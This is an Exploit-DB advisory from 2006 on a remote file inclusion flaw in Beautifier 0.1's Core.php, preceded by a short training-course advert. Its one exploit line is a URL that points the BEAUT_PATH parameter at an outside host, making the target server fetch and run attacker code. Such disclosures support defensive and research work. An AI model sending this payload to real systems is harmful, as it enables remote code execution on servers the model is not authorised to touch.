Beautifier 0.1 - 'Core.php' Remote File Inclusion

EDB-ID:

2314

CVE:





Platform:

PHP

Date:

2006-09-06


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

########################################################################
#  Beautifier v0.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://cmd.gif?
########################################################################

# milw0rm.com [2006-09-06]